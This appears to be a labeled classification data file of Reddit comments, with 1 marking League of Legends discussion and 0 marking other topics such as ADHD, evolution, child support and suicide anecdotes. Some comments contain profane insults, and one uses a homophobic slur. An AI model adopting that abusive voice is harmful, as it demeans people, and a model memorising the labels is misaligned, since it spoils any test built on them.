1	I'm pretty sure that this isn't the dedicated "Server Skin" for the Oceanic server. Riot had stated previously that they were having trouble with making a skin that would represent the entire Oceanic region. So rather than delay the server release to wait for the skin, they released it early with the free Ziggs skin as an incentive to transfer.
0	Day dreaming = not ADHD   This comment sums it up perfectly   OP: /u/TheBananaKing   >ADHD is about having broken filters on your perception.   >Normal people have a sort of mental secretary that takes the 99% of irrelevant crap that crosses their mind, and simply deletes it before they become consciously aware of it. As such, their mental workspace is like a huge clean whiteboard, ready to hold and organize useful information.   >ADHD people... have no such luxury. Every single thing that comes in the front door gets written directly on the whiteboard in bold, underlined red letters, no matter what it is, and no matter what has to be erased in order for it to fit.   >As such, if we're in the middle of some particularly important mental task, and our eye should happen to light upon... a doorknob, for instance, it's like someone burst into the room, clad in pink feathers and heralded by trumpets, screaming HEY LOOK EVERYONE, IT'S A DOORKNOB! LOOK AT IT! LOOK! IT OPENS THE DOOR IF YOU TURN IT! ISN'T THAT NEAT? I WONDER HOW THAT ACTUALLY WORKS DO YOU SUPPOSE THERE'S A CAM OR WHAT? MAYBE ITS SOME KIND OF SPRING WINCH AFFAIR ALTHOUGH THAT SEEMS KIND OF UNWORKABLE.   >It's like living in a soft rain of post-it notes.   >This happens every single waking moment, and we have to manually examine each thought, check for relevance, and try desperately to remember what the thing was we were thinking before it came along, if not. Most often we forget, and if we aren't caught up in the intricacies of doorknob engineering, we cast wildly about for context, trying to guess what the fuck we were up to from the clues available.   >Perhaps you're getting an idea of why we have the task-management skills of a five-year-old - and why we tend to have an "oh fuck" expression on our face whenever you interrupt us in the middle of something.   >On the other hand, we're extremely good at working out the context of random remarks, as we're effectively doing that all the time anyway. I've lost count of the times my wife has said "Hang on... how the hell did you know what I was talking about?"   >We rely heavily on routine, and 90% of the time get by on autopilot. You can't get distracted from a sufficiently ingrained habit, no matter what useless crap is going on inside your head... unless someone goes and actually disrupts your routine. I've actually been distracted out of taking my lunch to work, on several occasions, by my wife reminding me to take my lunch to work. What the? Who? Oh, yeah, will do. Where was I? um... briefcase! Got it. Now keys.. okay, see you honey!   >Quite often, if there's too much input, we can get kind of overwhelmed, like a new puppy surrounded by excited children. It's a flustery, unpleasant state to be in, halfway between excitement and anxiety, with no emotional component either way, but all the pacing and twitchiness of both.   >Also, there's a diminishing-returns thing going on when trying to concentrate on what you might call a non-interactive task. Entering a big block of numbers into a spreadsheet, for instance. Keeping focused on the task takes exponentially more effort each minute, for less and less result. If you've ever held a brick out at arm's length for an extended period, you'll know the feeling. That's why reddit, for instance, is like crack to us - it's a non-stop influx of constantly-new things, so we can flick from one to the next after only seconds. It's better/worse than pistachios.   >The exception to this is a thing we get called hyperfocus. Occasionally, when something just clicks with us, we can get ridiculously deeply drawn into it, and NOTHING can distract us. We've locked our metaphorical office door, and we're not coming out for anything short of a tornado. I've sat reading a book on a deathly-quiet country train platform, and not noticed a honking great train pull in about a foot from my nose, until someone tapped me on the shoulder. The same can happen with certain video games - what the fuck, it was light, now it's 4am.   >Medication - ritalin, in my case, takes the edge off. It reduces the input, it tones down the fluster, it makes it easier to ignore trivial stuff, and it increases the maximum focus-time. Imagine steadicam for your skull.   >It also happens to make my vision go a little weird and loomy occasionally, and can reduce appetite a bit.   >Ritalin (non-SR) is in and out of your system within 4 hours - it comes on in half an hour or so, and fades out fairly slowly.   >Is this of any help?
1	I recently got my smurf to 30 about 3 months ago. I use it to play ranked without as much mental pressure and to improve in a more care free way. I directly give credit to leveling and getting my smurf into gold giving me the push and the edge on getting to 2k~ mmr mid plat on my main. It has also opened up my champion pool and helped me against certain champions.   The thing about having a smurf is sometimes you can feel very frustrated about how games are going and/or feel like you are having bad luck but you still want to play without tanking your mmr or lp. A smurf helps you keep playing and improving but all of the sudden, wins and loses are not your top priority. I can confirm that on my main it's the win that matters above all. My smurf is more like 'I'm going to find the most efficient way to counter jungle and see if I can get the game snowballed by 15 minutes for a few games and then see how I can incorporate that into my current style' type thing.   Also, a solid player confident in his abilities is not going to flaunt smurfing in champ select or in game in all chat. That's just a douche who wants to feel entitled and superior to everyone because they have hit a skill wall on their main.
1	Recently I've been playing a lot of Aatrox, mostly in the jungle and its really strong to build him full tank because he has so much in built damage. If you build him full tank you still get amazing damage from his W and E at early levels, not to mention most of them start with the double dorans - mobility boots on him (yes, in the jungle) he also gets useful stats from tank items such as spirit visage, which help with his duelling and even apply on his passive. Building him full damage often means you're a glass cannon, and will just get cc'd to death.
1	Refusing to play with the meta isnt reportable, however refusing to cooperate with the team is. If you at the very start said "Id like to Talon mid, please pick a AP top or AP jungler please", then thats just switching things around, nothing wrong. However if top is already picked and you click talon without warning, and your team asks you to play a AP carry cause your team is lacking one and you refuse to, that is reportable. Its like when your lastpick refuses to support, so he refuses to communicate with team and fill what they need, and goes duo mid/duo jungle, when your team wants him to bot.   It really depends on the context.
1	Seriously ignorant player.  Cannot believe he has the opp to play on such a renowned team in Crs.  Make them look bad for even being affiliated with this toxic pile of trash player.  Fuck Crs Kcrash, I hope Riot serves him what he had coming to him.   Thank you, Please ban fuckheads from LoL.
1	The point is that Zed utterly shits on mages and the one advantage they might have which is poking and farming safely is impossible because Zed does it even better. Every other mid assassin is fine because there's actually some risk involved in their laning phase, in the cases of people like Diana and Talon they can make the choice to use precious mana to secure a last hit or put themselves at risk by getting in melee range and being susceptible to poke. Katarina and Akali can last hit from a distance, but due to the nature of their respective Q's it requires good timing since the first half doesn't do that much damage. Meanwhile Zed does a shit ton of damage with his W/Q that outpokes ranged people, farms from a safe distance, and can be used virtually forever.
1	Genuine"?   Why would that matter?  PhantomL0rd is an entertainer, and LoL/eSports is an entertainment industry.   Personally, I'm pretty new to the scene and have no idea about the whole cried on stream thing.  If he came across as a douche to you, then by all means just turn him off and don't watch him.  But to berate him for being a "dramaqueen" suggests a failure of understanding regarding what it means to be an entertainer -after all, drama IS entertainment to the majority of people.   Drama can be created any number of ways -by having extremely high level/high stakes matches, by emotionally investing the audience in the personal story of a player or team, or by painting pictures of some players as good guys and others as villains.   For players who make the majority of their income through streaming (as opposed to salaried players living on sponsorship/winnings), providing audience entertainment is a number 1 priority.  Somehow, you need to make your audience care about you, or find you funny, or find you informative.  It doesn't matter how you do it, but you need a draw.  This is what allows players like Destiny (even though he is currently not top tier) to remain as a popular streamer.  If they use their   PhantomL0rd clearly buys into this philosophy -his rages/emotional outbursts are over the top, but that's intentional.  Did he need to scream and throw his headset?  Obviously not.  But if he hadn't we wouldn't have watched his youtube video -the play was good, but not particularly unique or exceptional for a high ELO match.   Is it morally offensive for a popular streamer to solicit donations from fans?  I don't think so.  At least, not as long as the fans are aware that they are donating directing to the streamer in exchange for entertainment.  It's a whole different can of worms if a streamer solicits donations fraudulently, by claiming they are for charity, etc.
0	I am prepared to get down voted...but Bing, for my searches...gives me better results than google.   For those who don't know, there are more factors now, and personally, the whole hive mind thing comes into play when wolfram alpha is brought into the mix...meaning, when I search for "networking" as an it guy, it might not be the "networking" that the grand majority of people look for...so I have to almost coerce my searches from Google..   While Bing seems to work for me better with less of the "how do i trick this search engine into giving me my data" dance I go through with google.
0	Imagine there is a circuit of relay races...different paths to "success" and there is one group (whites) of people that designed the circuits, defined, enforced the rules and, for everyone that chooses to, they race among themselves. Each time the baton is passed, look at that as a new generation in a family and, eventually, families begin to work together to increase the likelihood of them being about to succeed. This happens over the course of over 100 years so, the path & steps needed to reach success are at least understood by everyone.   Now, imagine there's another group (minorities) of people that for hundreds of years weren't allowed to watch the races then over the course of a generation were then told, they may watch the races but, only on the other groups terms. Meaning, they could only watch certain parts of certain races. This goes on for 100 years and after a lot of protests, violence etc. the group demands the ability to not only watch all the races but also compete in them. This group has a few stand outs that succeed and then other people try to follow suit and, as new paths to success are identified by this group, they recognize in order to build a successful foundation for their younger generations, their needs change. Unfairly, a lot of people from the former group have already honed in their skills and have had a foundation built for them that allows them to succeed.
1	Can't wait for /u/blakinola do make a
1	I agree with everything. When I first found Syndra I was blown away by how strong her damage was from level one, and it held all the way through to late game. She isn't as devastating as say a Karthus or Orianna because she's mostly single-target burst, but she can still set up wonderful opportunities for her team, or capitalize on opportunities herself. I love taking an early chalice and spamming the crap out of her abilities. I don't know if you've ever gotten a level 1 blue buff before, but I would suggest the hell out of trying it. You could say the potential is... limitless ^^slap ^^my ^^knee .   On a separate note, I've got a question about building Syndra for you. I commented on your YouTube video, but I figured Reddit was a better discussion platform. I never really liked building Abyssal Scepter on Syndra due to the fact that all of your abilities outrange the item's passive. I felt like that was gold wasted so I've never built it on Syndra. Why do you like building it on her and when have you found that it's more beneficial to do so?   P.S. This was my question from the YouTube video:   Oh yeah, I've also got a question about building Abyssal Scepter. While the AP and MR are good stats to have while laning mid (usually), it﻿ seems like the passive MR reduction wouldn't get used much due to Syndra's poke kit. Do you think that's gold wasted on what could be a Rabadon's/Void staff for more damage or Liandry's for extra poke/HP? I haven't ever built it because of this so I was curious as to your reasonings.
1	Oh man, I used to be in your exact shoes and actually I can say that I still am. that feeling when you want to go into a ranked game and you start feeling sick, having to go to the toilet and even feeling your hands get cold and shakey. It was especially bad when I did start going on win streaks because I didn't want to drop down again and that's when I began to tilt and lost just as many as I won. MY COUNTER: I play some music as I get into the game and try to focus on one thing in particular in the game -> should always be to CS as best as you can. If you do this your mind should just follow the team flow and plays will come up on their own (: Unfortunately for me after I have a game or two I feel too warn out and I stop for the day but i'm working on getting better at it.   Also no point listening to the people who say "It's just a game, don't be nervous". yeah it is a game, but it's still just like saying "Oh it's, it's just the speech that will decide whether you become a president or not" completely irrelevant and league un-important but still. It doesn't help (^:   Edit:
0	And you believe it is possible to have complete knowledge of the universe? I don't believe this is possible within the "lifetime" of the human race.   You are mixing the hypothetical and the real. I am making no claim about the capabilities of he human race. That is your own invention, and not something I wish to debate. The perfect knowledge I described is not agent specific. It could be a machine, or a wookie.   >Regardless, your approach may well apply to God - how do you know it does not?   What? Because of the definition of god.   >A complete deconstruction might lead to knowledge on the existence of God, assuming that we can indeed successfully shift the paradigm appropriately enough to discover such evidence. How can you say that it would do us no good toward what we crave?   Have you read Descarte or Kant or Hegel on this? You should. They did it.   >I mean, you don't know that - if you exhaust your search, what's to say you won't find God? This would certainly say something about the existence of God, if you DO find him.   Yeah, you need to learn what falsifiability is. I am making a presumption that we exhaust the search and don't find him. That is the point of contention: of course there is no issue if we do find him. The question is:  are there conditions under which we can say definitively that there is no god?  That is a very important question.   >could you explain to me why the existence of God must be subject to falsifiability? Why does our lack of ability to falsify his existence invalidate the idea that he exists?   I think that was perfectly clear when I stated that I could not explain that to you. It has to do with the scientific method. That is, a hypothesis ("there is a god") must be falsifiable for us to apply scientific method, and thus to ascribe a truth value. Any other justification for his existence is just unsatisfying gobbly gook, and thus this question of his existence has persisted.   >I have read philosophy, and regularly peruse wikipedia articles about philosophical concepts, but frankly, most of those philosophers bore the crap out of me.   You do not have the required skill set to analyze these concepts further. You claim that we should, "use" metaphysics, and then you say Kant bores you. Yes, I am sure Kant bores you when you read his wikipedia synopsis, or really, anything other than an in depth analysis and conversation, which usually means a university course.   >>They have good ideas, no doubt, but I fall asleep when I read them.   Name a single concept from Kant without googling. Come on, man.   Bottom line is that the take away from Kant is that god is a metaphysical concept, and since we only have access to the physical world, the question of his existence in incoherent. That is what I am saying. As to your point on modern Phil, very little of it concerns the topic at hand so, yes, you are right when you say that you are ill-equipped for this discussion.
1	I didn't read all of it, but from what I can glean...
1	I would say the issue with MF comes down to lack of mobility during team fights. In the current tank meta, it's already hard enough for a team to consistently peel for the ADC. So Lucian, Graves, Tristana, Corki, Kalista, and Caitlyn amongst others - all have at least one mobility skill to assist in this. Just my thoughts I suppose, I think her damage is fantastic.
0	I was arguing with someone who didn't believe in evolution, so I gave the example of the flu virus changing every year.  Their response was "yeah, but it changes into another virus, not say, a dog.", to which I was like "oh... There's the problem." I end up talking about evolution a lot and usually every argument is just me correcting misinformations about evolution.  People are far more comfortable accepting it when a biologist explains it.
1	Game 2:   CW: Great game from Forg1ven(MVP),he had a way better frontline,he had a really good start being 2/0 at early game and he could show why he is considered one of the best upcoming Marksmen in EU.Amazing looked way more active and in general better with lee sin,Cowtard was okay,Unlimited had some bad positioning(at one point he left Forg1ven alone,even tho in the end forg1ven won because of good kite and being way ahead in terms of gold) and Youngbuck had a bad early game again but he had a strong pick so he could be usefull in teamfights.   MYM:Kubon had a very good start,but because of the fact that the rest of the team wasnt doing well,he often had to go and help them instead of split-pushing which is Tryndamere's thing.Makler had his best pick,yet his positioning was bad and he tryed to flank with eve which didnt work out that well.Libik was good but he couldnt use annie properly because of the fact that his team was way behind and they couldnt initiate properly.Mokatte went again from a mix of damage and health which again didnt work out that well,also his flank wasnt that good either.Czaru again didnt have much impact in the game.
0	Id say that 95% of the N.Korea posts are made purely in jest. I don't think that there is much of a disregard for human life here. Iv'e met a lot of people who are/were in the military and I'm sure a lot of them would even appreciate some of the darker humour.   I'm glad that we can all show how much we value human life every now and then. I don't think that should stop us from cracking jokes and being optimistic though. "War is always pointless and a shit ton of you are going to die on the battlefield" does'nt have much of a punch line to it.   This is coming from someone who is in the process of joining the military.
1	Well, the counterplay to him is that you don't let him free-farm.   Even if you aren't playing a lane bully, it is on your jungler to be camping top and preventing Nasus from farming until you are so far ahead you can just keep bullying him out of lane.   Not only does that set his Q behind by a few hundred stacks, but is also just prevents him from becoming tanky. Nasus relies heavily on items, and is super squishy without them.   *
0	Why don't you just say "Hello" to them? Hell a person might be having a shitty day and seeing someone they know could really cheer them up. Saw a buddy that I hadn't seen since last semester walking down the sidewalk. Turned out his dad had passed, girlfriend had broken up with him and turned his "friends" on him, and he had been having a hard time dealing with it, and therefore not out in public much. We talked for a bit and went on our way.   Later on that day, I get a text from him thanking me for stopping to talk because he had thought about ending his life. Told me seeing that he still had true friends in the world helped make him happy. We're hanging out tonight and just relaxing.
1	Hmm seems logical let me just upvo-..  reaches
1	Bcos riven is ridiculously inbalanced,no other hero can build all AD and still be that mobile and difficult to kill, as well as the amount of range she has when she is a melee champ is ridiculous. The Most average riven players can wreck almost anyone on almost any champ, and as such they think they are god's gift to league of legends, they are the most skilled player in the game and you should be thankful that you were gifted the opportunity to have them on your team, or in the other case you should accept your a worthless "Noob who doesn't deserve their elo" or should "sell thier skin" If you are against them and your team can't afford to have the jungle permanently in her lane to avoid her being able to 1 v 29,000000.
0	Even then I would disagree. My mom was told that I had a condition (cant remember the exact name) that my brain will be located outside of my skull at birth. And he kept trying to push her towards abortion. My mom continually said no but it got to the point where she had to switch doctors at 7months with me because of his views. And then she gave birth and I obviously have no such issues and am perfectly okay!
1	Many would play a lot better if they wouldn't stress themselves so much - and they would have more fun.   Think of it as a path you want to walk.   If you only walk that path to reach the destination, the path itself is worthless and you may miss a whole lot of things on the way because your mind is not open for them.   In LoL this means that you don't learn as much as you could, because you are like "I don't want to learn, I want to climb."  This is equal to thinking "I don't want to walk the path, I want to arrive at my destination."
0	I worked at Boston Pizza and I had a hard end shift time of 10:30pm (last bus) because otherwise I have to walk for almost an hour to get home. I told them I realize that shifts don't end at that time so don't book me for closing shifts.   They always booked me on 8pm ends, and had me stay due to people not showing. Then at 10:30 when I tell the kitchen manager I have to go, he would say I can't and that I should wait until he's done so he can drive me home.   Yeah I want to wait until 2 for the restaraunt to close, then another hour or two for him to do back office stuff. Are you fucking kidding me?   I left there on good terms and begrudgingly went back when I lost a different job due to starting school again. In the interview I explicitly told them I  absolutely  had to leave at 10:30 at the latest on weeknights, and if they couldn't handle that they shouldn't re-hire me. They said it was fine.   FIRST FUCKING SHIFT they tried to pull that exact same shit on me. The kitchen manager yells at me "If you leave now don't bother coming back" So I threw a pizza on the ground, put up both middle fingers and said fuuuuuck you and walked out.   Always wanted to do that, and it was even more satisfying than I could have ever imagined.
1	I was playing as Kennen top in a normal Queue with 4 friends, and I was massively fed. We were in their base, 5 vs 5, and we won a teamfight where I got a quadra, but then Vayne stole the penta, and only Vayne and I survived the fight. Then, Vayne suicided to their fountain for "redemption" and I was unable to finish the game. They respawned and I died, and about 20 minutes later, we lost.
1	I find a major problem with fiddlesticks is unwilling tanks to tank.  I had one game where this Jarvan called in the pre-game lobby that he was going to tank; however, during the game he decides that instead of going in like the tank he was building he would watch us die because he was "trying not to die".  He kept going on about how I would never use my ult, but I never could because if I did it without him tanking the enemy team would just take me down instantly.  Without a good tank it is extremely difficult a decent ult where you don't get focused down in seconds.
0	Out of curiosity, did this sort of thing translate into your life? Like, do you manipulate people, or see ways to hurt others without being blamed for hurting them?
0	For me, there is no comparison between the two. I wouldn't say I 100% agree with homosexuality, and no, it isn't because of religion. However, I do 100% agree with them being able to live their life however they choose and having the same rights and freedoms as anyone else in this world. Having said all of that, pedophilia is a completely different beast. We're talking about adults who know the difference between right and wrong, who know the difference between what is okay and what is not. Adults who are taking advantage of young children who don't know any better, using all sorts of things to get them to come with them somewhere, then they rape them, and then use pictures and videos of the act to further get off and spread this cancerous garbage(understatement for sure) among other completely fucked up individuals who couldn't get even a prostitute to suck their dicks. Absolutely deplorable.
1	I disagree, only because i feel like carry junglers aren't being nerfed out. But riot is making us have to open up our champion pools to find other carry junglers. And with the change's to spawn times at 1:55 it'll make counter-jungling/late invades/early ganks easier to pull off as a lot of people don't ward right at 2:03 (when top and bot minions hit eachother in lane) and you can usually kill Blue/Red by 2:03 with a decent leash depending on the jungler and instantly you can hit a lvl 1 lane for a FB or 2x summoners.. Just try not to think about the FOTM junglers and think outside the box. I wont name any off, but there are some junglers out there hiding at the moment that work 100% in EVERY team comp, and can do pull a supportive AND a carry roll depending on how the early game plays out and whether the jungler is getting the kills or giving them up to his lanes.
1	Actually lucian has no chance to survive 1v1 against a decently farmed xin with youmuus if he manages to dash to you. You really need your support to peel for you while you kill him, or at least have flash to get away.   Your dash is so small that the slow from his E + the movement speed from youmuu's allows him to close the gap you create with your dash and then get off his third Q, at which point you are most likely dead.
1	I don't have any problems with your ideas; Cory presented an argument, you posted a counter, I differed from your post. That's it as far as I am concerned.   I only said that the problem people are having is the way in which you are responding. This is an open forum for free ideas, why bring aggression into it? Even the guy on your side admits you are being a bit harsh:   > Cor doesn't really make the effort to make polite overtures.
0	so, what you are saying is that even though i am  struggling  to support my son, all of his needs are met with my money, therefore his father should carry no financial responsibility? could you tell me what part of raising/supporting our son  is  his responsibility? cuz, ya know, sometimes, your husband leaves you with a 3 month old child, without warning and with no money or a roof over your head. sometimes you have to ask food banks for help. sometimes you have to pawn your great grandmothers jewelry to buy diapers and clothes. sometimes you have to go without, just so your kid can have.   granted, i  can  support my kid  by myself  now, BUT it took a whole fuck of a lot of work to get to this point  by myself .   and ill tell you this- support WAS ordered in our divorce. $55 every two weeks. he still didnt pay, nor did he exercise his visitation. 13 years later, still no payment, even though they dropped it to $20 a week, and he hasnt so much as laid eyes on his son since september.   a child is a joint effort. kind of like a business. you and your business partner take out a loan. then you decide you dont want to be in business anymore, AND you dont want to pay your share of the loan. is that your partners obligation now? NO. you BOTH made the mess, you BOTH signed the paperwork, the loan is the responsibility of BOTH partners, even if one is financially better off than the other.   and honestly- men who think the way you do should be ashamed. how dare you say that if a woman makes enough to support the kid, that the father gets off scot free. fuck that. if you dont want to pay child support, then maybe you should sign over your rights, so that the woman who  does  right by your kid, doesnt have to look at your pathetic ass every other weekend.
1	with base damage nerf it makes more sense to rush dcap even more. The whole idea of rushing spen is that your base is doing max possible damage. Such champs like elise with low ratio but high base benefit from it most.
0	The exact thing happened at my school. A "popular" kid blew his brains out because his girlfriend lied to him that she was pregnant as a joke and he was scared so he ended it.  After that EVERYONE (even kids from another school) on twitter was going on about how much he was probably bullied and how you never know what's really happening to some people.  Even though this kid was popular and was never bullied.  Well there was another emo-ish kid who definitely had some serious bullying problems and needed a lot of help eventually committed suicide shortly after and nobody cared nearly as much as when the popular kid died.
1	I'm not bent out of shape, I simply suggested that you read the comments on your other post. I don't see the issue with that.   Also, against reddit rules to ask for upvotes, so creating a post to gain upvotes is pretty close to being against the rules...   And lastly, the reason your post didn't get many views is because it got out of front page of the new tab because many posts are created because many people repost their posts or of posts saying the exact same thing (I'm looking at you "RIP Ahri" posts...).  You re-posting is exactly the reason that your 1st post didn't get that many views , just so you're aware...
0	It's not lies. Her mom said her uncle was going to send grandma in to get raped and uncle looked at her like she was crazy and said "stay out of my business" so it must be true.
0	Ah well, we're about even when it comes to robbing each other of credit on inventions. And it's not hilarious, it's outrageous. At least to you it is. Otherwise you wouldn't be correcting me.   I'm upvoting you because you're correct, and smirking because I managed to unwittingly annoy someone. Don't start laughing at my ignorance - this shit has happened to you too and you know it.
1	Going by the wiki... At ult level 3 the base damage is 25% of targets maximum health. This has an ap ratio for bonus damage of +0.02% per ability power. As there is 75% left unaccounted for, 75 divided by 0.02 is equal to 3750 AP. This is the amount required to one hit with her ult only.   Please notice the difference between her ult and DFG description. Eve ult does a percentage of maximum health. DFG does a percentage of current health. Therefore, always use DFG first to maximise damage.   So putting this data into an datasheet and computing a graph. The result is something like this.   The equation for the line is displayed as y = 0.06x + 50.012 We want y to equal 100 Therefore, 0.06x = 49.988 x = 833 AP   I am not sure how DFG scales with AP, is it a gradual change or does it only change in steps every 100 AP as suggested by the description? "(+4% per 100 ability power) "
0	I once spent two weeks, 3 hours a night, writing an essay for history class. I even had my mom help me, since she had majored in History and English. Anyway, cut to a week after it's handed in and I get my essay back. It's got a B+.   A. B. Fucking. +.   I looked at him with complete disbelief. I had sacrificed  hours  of each night, for two weeks, had my mother nitpick each revision, and even skipped a friend's birthday party for a  B+!?   That was unacceptable. I had been getting shut marks from this guy this whole semester, and I was planning on this being my first A+ in a long time . I go up to him, and ask him, and I quote, "Why the fuck did you give me a fucking B+ on this fucking essay?" I was normally a pretty quiet, if not awkward, kid but I was so angry that I wanted to punch him in his well shaven face.   So he looks at me and says, no change in his previously neutral expression, "You obviously didn't try hard enough". I can't honestly say that I didn't want to take his pencil and jam it in his ear, because I really, really wanted to. But I decided to, instead, learn how to write the best fucking essay in the whole world. After that day, I never got less than an A on an essay, ever again.
1	I'm no pro but seems like your question is asking how to be recruited. Recruitment pretty much works the same way across all fields, whether it be a job, sport, or esport.   The first and most important part to recruitment is exposure and publicity. How is a recruiter supposed to know you're any good or even pay the slightest attention to you? Well first thing is he/she has to know you exist. Advertise stream, make your stream stand out to a point that you have a solid viewer base. Of course there are pros that might have gotten recruited by other means, but in my opinion that is a good place to start.   Secondly, let's think about the reasons a recruiter would think that you could be a valuable asset to their team. Put yourself in the shoes of the recruiter. What would you look for if you were a recruiter. Well right off the bat, I could imagine your main role to be pretty important. Judging by your name, your main role is the mid lane. A team that is looking for a support will probably opt to go with a support main.   Lastly, say you get the attention of a recruiter and your role is what they're looking for to fill a team? Showcase your abilities. I like to compare league with basketball a lot of the time as I find them to have a lot in common. 5 roles, and they all work together to get the win. A recruiter looking for a point guard is at your game, and you're a point guard. What do you do? You try, try and try your hardest to impress them. Of course with league (and even basketball) it's damn near impossible to tell whether a recruiter is watching, so solution is just to continually play at your best!   Also, starting your own team is always an option. With that said, I would love to watch your stream! You can PM me. Looking forward to hearing about your success, and good luck!
0	Ya so I still don't know what
0	I remember reading a story probably on reddit actually, about someone who worked at Taco Bell.   Some kids came in with a bag, didnt order anything, and started shoveling taco bell sauce into the bag by the handful. When the flabbergasted cashier guy saw them he said "HEY what are you kids doing???"   They just said back "Momma's makin TACOS" then they ran off with their loaded bag of sauce packets.
1	It's not the trolling or shit talking that gets me... See I time every buff and objective in game...so when people talk it gets lost. So now instead of muting/ignoring the other team I only have to mute chatty faggots on my team...non directive unhelpful banter can be reserved for post game chat IMO
1	As we all know, having high solo queue ranking doesn't mean anything about your prospects of becoming a pro player.   Yes, because all the pro players you see today were picked up when they were low ELO scrubs. /sarcasm   >Solution: Remove the challenger tier from solo queue and remove the cap on league points in Diamond 1, or change the challenger tier to allow an unlimited amount of people in solo queue.   DIAMOND 1 WOULD BE THE SAME THING AS CHALLENGER, THERE WOULD BE NO POINT. Holy shit. If you removed challenger there would be no way to see the top rankings of the ladder, WHICH IS THE WHOLE POINT OF RANKED PLAY.   >Challenger tier is useless in solo queue because it is meant to be a gateway for new players to go pro, but solo q is no indicator of your performance in the professional scene.   Basically Challenger is there to CLEARLY show who is at the top of Solo Q, if they happen to get picked up by a pro team then good for them.
1	NOTE: I'm basing this off of how Reginald acted strictly in this video. I don't know either of them as people, nor have I met them, so I acknowledge that I may "not have a clue on what I am talking about", but I would still like to offer my opinion on this. Also, my views are in relation to Reginald's behavior OUTSIDE of the game, not with how he plays (although there may or may not be a correlation).   Honestly, they way it started was kind of both of their faults, though I still lean towards Regi handling this situation ineffectively both as a leader and as a person.   Dyrus expressed discomfort with how loud the others were being, and while he didn't say it in the most courteous way, he was not being overtly aggressive nor was he trying to pick a fight.   You hear Regi's response after Dyrus' complaint, "Dyrus, what is wrong with you dude," and you can tell he is trying to pick a fight. He starts off just calling him rude and Dyrus tries to brush it off, but he keeps going.   Unfortunately Dyrus can't really articulate what he why he is annoyed, other than saying "I'm playing a game." At least at first.   Dyrus tries to end the argument by just saying sorry, but Regi keeps berating him, saying he doesn't mean it and "the tone" of how he said sorry is rude, and that "he doesn't mean it."   This is where I have the biggest issue. When you have an arguement with someone, you can't just expect them to be genuinely sorry. There are usually gonna be hard feelings. The fact that Dyrus just said sorry, regardless of the tone, showed that he wanted to end the conversation and be done with it, while Regi just kept harping on him. While Regi may have wanted to resolve the issue properly, which is understandable, his  own  tone and his attitude led to an even more elevated argument.   This is the crux of where Regi needs to develop as a person. He is stubborn in that he wants to assert that he was right in his actions, and he can't just let it go.   Now the conversation brings out where Regi needs to develop as a leader. Dyrus breaks a little and expresses that he is stressed out (as the whole team probably is) and that he is trying to focus to beat C9 and the other teams that they are scrimming. Regi ignores this and talks about how he only argues when he is right. He goes on to say that Dyrus doesn't contribute, and then when Dyrus tries to counter, Regi alters his statement and says that Dyrus doesn't contribute productively. This is the last thing you want to be doing in a situation where team morale is so important. Regi is pretty much marginalizing Dyrus and saying that Dyrus doesn't help the team in discussions. He rants about how Dyrus' isn't being productive, when he can't see that his own stubbornness is causing an emotional tear, which is probably going to be just as hurtful to the team. The fact that he also altered his statement to include that Dyrus does in fact contribute (just not productively) shows that Regi had to accept Dyrus' point, but he didn't want to accept that he was entirely wrong in arguing.
1	The problem with using a bot to ban phrases being said is it effectively kills the rivalry all together in chat.  You send the message that trash talk and competitive supporting of your region/team/player is not allowed.  I think Twitch could do well to implement a multi-chat option.  This would allow any streamer to divide topics of discussion, allowing trash talkers to continue doing so with other people wanting to trash talk, while those wanting to discuss game analysis can chat in their own trash talk free room.
1	Pretty much this. They probably have a bitset determining what objects can collide with the object in question(e.g. players, wall, projectiles). So they probably coded the wall to intercept projectiles, but things like Ziggs' ult don't have any actual travelling frames once it gets to a certain  "height", they just calculate a parabola for it's descent and warp it to the appropriate location for it to appear it traveled a continuous arc. Since the object isn't actually in the scene, collision isn't calculated for windwall.
1	Main AD carry here (~1650-1700 elo) and flash heal is probably the strongest summoner combo you can take. If the enemy has exhaust, just disengage and run back until it's over, then re-engage and you can usually take them down with the help of heal. If they take ignite, if you can tell they are committing to the fight fully, pop heal when you get to ~50% hp. Chances are, they are saving ignite until you get low enough so that it'll kill you, and heal heals for more than ignite does dmg. Also, if you are fighting against an ad carry with cleanse, you know you can trade a lot better in fights and harassing because you have so much more effective hp from heal. Late game cleanse may be better than heal, but QSS > cleanse, as QSS removes ALL debuffs from your champ, and if you run QSS and cleanse it's just unnecessary. Also, with flash + heal, late game if you get jumped on and chunked, you can usually flash away, pop heal, and destroy whoever jumped on you (unless they are extremely fed and you aren't farmed enough)
1	I'm not saying that Koreans are somehow genetically better than Westerners   You don't even have to dance around the racial-differences argument to explain (well, hypothesize) why most people's experience says Asians are better at matters of calculation.  It's likely a matter of language, not genetics .   In short, Asian numbering systems do not create new words for anything but orders of magnitude past 10 (100, 1000, etc); everything is expressed as a combination of the numbers from 0-9 and orders of magnitude. 11 is "ten-one", 12 is "ten-two", 21 is "two-tens-one", etc. So they use a lot fewer distinct words and a lot less time to express the same numbers, and reputable research reports that those who speak languages with shorter expressions for numbers are generally able to remember more of them.
0	I don't have to. He said could have. Not would have. I can't help it if you don't know english.   But, here you go....
1	first of all i guess it was obvious that azir needed a little tuning. ever since he was released i couldnt stop playing him since i enjoy high skill-cap champions. even when he was basically without ultimate and only every second aa on w-spawn would work, he was still pretty strong.   we should not look at lcs proplayers for this, but even the best players have a problem with him, his early farming sucks! its just better to use normal aa to lasthit early since otherwise you will just push and be exposed and the low attackspeed and mana really costs some lasthits. but even tho hardengage and cc could just bring him down midgame like vi mao, he is pretty safe lategame with zhonyas ult and e.  so riot reduced w range. in my opinion this hurts his laningphase the most. reduced w range means you need to walk up farther to get those casterminions or to harrass with w aa q aa. i think he has alot of bad matchups now mid if he cant get some harrass down. xerath ziggs just outrange you and will constantly shove and like every azir player knows, lasthitting under turret fkin sucks or you need to burn quite some mana to get all of them constantly, while tryin to dodge abilities.  same goes with ahri, after 6 she has constant killpressure if u cant harrass her, and if vi ults you its just over.  leblanc, with her mobility, wont get dmg and can constantly harrass you, god beware u missuse ur dash.   i could go on but my point is, such a hard to play and master champion like azir who really needs some items to scale and was already pretty vulnerable got hit pretty hard. is soldiers range scaling with w rank a solution? maybe yes but i disklike this option. id rather see some small buffs: get that range up again, maybe to 375 but make his w reset his autoattacks (maybe only if he has no soldier summoned), this will help him farm alot. other than that i think azir is a strong champ with amazing scaling, that can get farmed like a scuttlecrap early-midgame with the right picks. what he gonna do against a j4 xerath lane. flag and drag, position that he cant e and will just dash into you and look at him dying. lb if played right can always get some good dmg out while still being safe. lategame teamfight? he is still just autoattacking and q-ing for dmg so he is rather immobile. just ult him with ziggs xerath vi or sth and watch his hp go below 40%.
